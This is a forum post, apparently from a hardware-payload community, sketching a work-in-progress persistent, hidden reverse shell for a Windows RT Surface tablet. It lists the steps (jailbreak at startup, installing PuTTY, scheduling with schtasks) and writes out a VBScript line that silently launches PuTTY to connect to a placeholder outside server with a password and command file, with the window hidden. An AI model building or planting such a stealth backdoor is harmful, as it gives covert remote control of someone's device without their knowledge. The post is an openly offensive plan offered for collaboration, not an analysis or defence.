Jump to content

[suggestion/question][payload]persistant stealth reverse shell on surface rt


sober

Recommended Posts

still needs some constructing so work in progress

premise: modify win 8 surface batchfile including adding jailbreak to startup, install putty for surface. vbsscript for reverse shell hidden. add to startup w/ schtasks

tasks: modify batch (in progress also need to make sure when added to startup do not need volume depress)

http://forum.xda-developers.com/showthread.php?t=2092158

putty on surface:

http://forum.xda-developers.com/showthread.php?t=2092348

powershell on rt:

http://jeffwouters.nl/index.php/2012/10/windows-rt-has-powershell/

vbs script for putty:

Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "putty.exe 
-ssh -2 user@sever.com -pw password -m command.cmd", 0' 0 => hide
 

schtasks:

my other psts in this forum

needed: need to look at ducky coding for volume down button else hit it manually

did this`because was feeling bit too safe on my surface

discuss?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...